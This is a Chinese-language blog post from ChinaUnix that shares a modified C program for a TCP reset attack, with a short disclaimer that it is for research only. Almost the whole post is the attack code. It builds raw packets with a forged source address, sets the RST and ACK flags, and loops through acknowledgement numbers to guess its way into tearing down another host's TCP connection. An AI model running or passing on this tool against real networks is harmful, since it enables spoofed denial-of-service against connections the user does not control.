Chinaunix首页 | 论坛 | 博客
  • 博客访问: 154824
  • 博文数量: 27
  • 博客积分: 414
  • 博客等级: 下士
  • 技术积分: 250
  • 用 户 组: 普通用户
  • 注册时间: 2011-10-06 15:52
个人简介

身为挨踢人,却不想被挨踢。努力多学点。

文章分类

全部博文(27)

文章存档

2012年(17)

2011年(10)

我的朋友

分类:

2011-10-26 16:33:57

原文地址:tcp reset attack demo code 作者:zoleo

贴一个我改的tcp reset攻击程序。
说明:这个程序是我根据网上的程序修改的,原来的好像不好用。仅供研究,严禁利用下面的代码进行任何形式的攻击。本人不对任何人使用下面代码造成的网络安全问题负责。
 

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<errno.h>
#include<netinet/tcp.h>
#include<netinet/ip.h>


#define S_ADDR "10.0.1.1"
#define D_ADDR "10.0.1.5"

unsigned short S_PORT = 0;
unsigned short D_PORT = 0;

struct tcp_fake_header {
        unsigned long saddr;
        unsigned long daddr;
        char mbz;
        char proto;
        unsigned short header_len;
};


static unsigned short inline checksum(unsigned short *buffer,int size){

        unsigned long cksum = 0;

        while(size>1){
                cksum += *buffer++;
                size -= sizeof(unsigned short);
        }

        if(size){
                cksum += *(unsigned char *)buffer;
        }

        cksum = (cksum >> 16) + (cksum & 0xffff);
        cksum += (cksum >> 16);

        return((unsigned short )(~cksum));
}

unsigned int inline tcp_checksum(unsigned long saddr,
                                                                unsigned long daddr,
                                                                unsigned short *buffer,
                                                                int size)
{
        unsigned long sum = 0;
        char *buf;
        struct tcp_fake_header *tfh;
        int tfh_len = sizeof(struct tcp_fake_header);

        buf = (char *)malloc(tfh_len+size);
        tfh = (struct tcp_fake_header *)buf;
        memcpy(buf+tfh_len,buffer,size);

        tfh->saddr = saddr;
        tfh->daddr = daddr;
        tfh->mbz = 0;
        tfh->proto = IPPROTO_TCP;
        tfh->header_len = htons(sizeof(struct tcphdr));

        sum = checksum((unsigned short*)buf,tfh_len+size);
        free(buf);

        return(sum);
}

unsigned int inline ip_checksum(unsigned short *buffer,int size){
        return(checksum(buffer,size*4));
}


int main (int argc, char *argv[])
{


    if(argc < 2){
        printf("usage %s sport dport\n",argv[0]);
        return -1;
    }

    S_PORT = (unsigned short)atoi(argv[1]);
    D_PORT = (unsigned short)atoi(argv[2]);

    //Create a raw socket

    int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
    if(s < 0){
        printf("error on create socket %s\n",strerror(errno));
        return -1;
    }

    //Datagram to represent the packet

    char datagram[4096];
    //IP header

    struct iphdr *iph = (struct iphdr *) datagram;
    //TCP header

    struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct iphdr));
    struct sockaddr_in sin;
    unsigned long seqguess = 0;
    unsigned long seqstart = 0;
    unsigned long seqinc = 1023; /* size of send window */
    unsigned long seqmax = 4294967295;
    unsigned long count = 0;
    unsigned long count2 = 0;

   
    sin.sin_family = AF_INET;
    sin.sin_port = htons(S_PORT);
    sin.sin_addr.s_addr = inet_addr (S_ADDR);
   

    memset (datagram, 0, 4096); /* zero out the buffer */

   

    //Fill in the IP Header


    iph->ihl = 5;
    iph->version = 4;
    iph->tos = 0;
    iph->tot_len = sizeof (struct iphdr) + sizeof (struct tcphdr);
    iph->id = htonl (54321); //Id of this packet

    iph->frag_off = 0;
    iph->ttl = 64;
    iph->protocol = IPPROTO_TCP;
    iph->saddr = inet_addr (S_ADDR);
    iph->daddr = inet_addr(D_ADDR);
    iph->check = ip_checksum ((unsigned short *) datagram, iph->ihl);

    //TCP Header 
    tcph->source = htons (S_PORT);
    tcph->dest = htons (D_PORT);
    tcph->doff = 5; /* first and only tcp segment */
    tcph->fin=0;
    tcph->syn=0;
    tcph->rst=1; /* set rst flag */
    tcph->psh=0;
    tcph->ack=1; /* and ack flag */
    tcph->urg=0;
    tcph->window = htons (5840); /* maximum allowed window size */
    /* if you set a checksum to zero, your kernel's IP stack
       should fill in the correct checksum during transmission */


    tcph->check = 0;
    tcph->urg_ptr = 0;

   
    {
        int one = 1;
        const int *val = &one;
        if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
            printf ("Warning: Cannot set HDRINCL!n");
    }


    printf("send packet from %x:%d to %x:%d\n", iph->saddr,S_PORT, iph->daddr, D_PORT);

    for(seqguess = seqstart; seqguess < seqmax - seqinc; seqguess=seqguess+seqinc )
    {
        count++;
        count2++;
        if(count2 == 8192){
            count2 = 0;
            printf("Packets sent: %lu\tSequence guess: %lu\n", count, seqguess);
        }
        tcph->seq = random();
        tcph->ack_seq = seqguess;

        tcph->check = tcp_checksum( iph->saddr, iph->daddr, (unsigned short*)tcph, 0);

        //Send the packet


        if (sendto (s, /* our socket */
                    datagram, /* the buffer containing headers and data */
                    iph->tot_len, /* total length of our datagram */
                    0, /* routing flags, normally always 0 */
                    (struct sockaddr *) &sin, /* socket addr, just like in */
                    sizeof (sin)) < 0){ /* a normal send() */

            printf ("errorn %s\n",strerror(errno));
            break;
        }

        //Data send successfully


        else {
        
         // printf("check sum of tcp %x,sizeof ip packer %d\n", tcph->check, iph->tot_len);

        }

        usleep(50);
        //sleep(5);


    }

    return 0;

}


阅读(825) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~